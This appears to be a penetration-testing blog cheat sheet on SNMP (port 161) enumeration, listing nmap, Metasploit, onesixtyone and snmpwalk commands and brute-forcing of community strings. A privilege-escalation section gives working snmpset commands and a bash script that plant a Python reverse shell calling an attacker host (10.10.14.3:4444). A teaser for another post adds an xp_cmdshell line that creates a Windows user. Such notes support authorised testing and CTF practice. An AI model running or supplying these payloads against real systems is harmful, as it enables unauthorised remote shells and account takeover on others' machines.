Skip to main content

SNMP - Port 161 Enum


Basic info About SNMP

Ports - 161,162,10161,10162/udp 

SNMP is a based on UDP, stateless protocol --> susceptible to IP spoofing and replay attacks.
SNMP1, SNMP2, SNMP2C --> can be locally irrupted over a local network.

SNMP is a UDP protocol & UDP scanning that UDP requires a matching port and payload or it won't respond.
This means we have to get the community string correct or we won't get any sort of a response.

In-case, when a response is received, it contains the community string, and the scanner can
identify the valid community string. MIB-values 1.3.6.1.2.1.25.1.6.0 System Processes 1.3.6.1.2.1.25.4.2.1.2 Running Programs 1.3.6.1.2.1.25.4.2.1.4 Processes Path 1.3.6.1.2.1.25.2.3.1.4 Storage Units 1.3.6.1.2.1.25.6.3.1.2 Software's Installed & Hotfixes 1.3.6.1.2.1.6.13.1.3 TCP Local Ports
1.3.6.1.2.1.1.1 System Description


OID and MIB Hierarchy
OID and MIB Hierarchy - the way MIB-Values are created



Enum via NMAP
#Run SNMP Nmap Scripts
nmap -sCUV -p161 --script=snmp-info,snmp-interfaces,snmp-netstat,snmp-sysdescr,snmp-processes,snmp-win32-software 10.10.10.10

#Brute forcing communitystrings
nmap -sUCV -Pn -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.10.10

#Run all scripts related to snmp
nmap -sU -p 161 --script snmp-* -Pn 10.10.10.10
Metasploit
#SNMP ENUM 
use scanner/snmp/snmp_enum 
set RHOSTS 10.10.10.0/24 
run
#Find SNMP Shares
use auxiliary/scanner/snmp/snmp_enumshares
#SNMP_Login
use auxiliary/scanner/snmp/snmp_login
set PASS_FILE  /usr/share/wordlists/rockyou.txt
set RHOSTS 10.10.10.0/24 
run

Check this for SMBPSet
Enum via SNMPENUM Script
git clone https://github.com/ajohnston9/snmpenum.git
perl snmpenum.pl 10.11.1.115 public linux.txt
Enumeration using OneSixtyOne

#Checks for given Community Strings for given IP addresses
for ip in$(seq 100 254) ;do echo 192.168.31.$ip; done > ips.txt
or
prips 10.10.10.0/24 > targets.txt Community Strings sample path = /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt #brute force community strings against IP Addresses
onesixtyoone -c community_strings.txt -i ips.txt

#multiple communities against a single host
onesixtyone -c community_strings.txt 10.10.10.1

#Multiple Targets against a single Community string
onesixtyone -i ips.txt public
Enum Using snmpwalk
snmpwalk -c public 10.10.10.1 -v 2c
snmpwalk -c pr1v@te 10.10.10.1 -v 2c #/v1= SNMP version1, -c =community string - public snmpwalk -c public -v1 192.168.11.130 #Get Running Processes snmpwalk -c public 192.168.11.130 1.3.6.1.2.1.25.4.2.1.2 #Get Open TCP Ports snmpwalk -c public 192.168.11.130 1.3.6.1.2.1.6.13.1.3 #SNMP Extended List sudo apt-get install snmp-mibs-downloader sudo download-mibs sudo nano /etc/snmp/snmp.conf mibs +ALL #Add NEW MIBS snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
Enum using snmpbulkwalk 
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . 
snmpbulkwalk -c public -v2c 10.10.10.10 .
Enum Using SNMPCheck 
#Basic Syntax
snmpcheck -t 10.10.1.1 -c public
Priv Esc when you have snmpd.conf - rwcommunity string
sudo apt-get install snmp-mibs-downloader
sudo download-mibs
sudo nano /etc/snmp/snmp.conf
mibs +ALL #Add NEW MIBS
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD 10.10.10.10 ‘nsExtendStatus.”evilcommand”‘ = createAndGo ‘nsExtendCommand.”evilcommand”‘ = /usr/bin/python3 ‘nsExtendArgs.”evilcommand”‘ = ‘-c “import sys,socket,os,pty;s=socket.socket();s.connect((\”KALI_IP\”,PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\”/bin/sh\”)”‘

#Find the ISO
snmpwalk -v 2c -c PASSWORD  10.10.10.10


Automating the task using python:

nano snmp-shell.sh
#!/bin/bash random="holyshit" snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD 10.10.10.10 \ "nsExtendStatus.\"${random}\"" = createAndGo \ "nsExtendCommand.\"${random}\"" = /usr/bin/python3 \ "nsExtendArgs.\"${random}\"" = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.3\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"' snmpwalk -v 2c -c PASSWORD 10.10.10.10 1.3.6.1.4.1.8072.1.3.2


Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in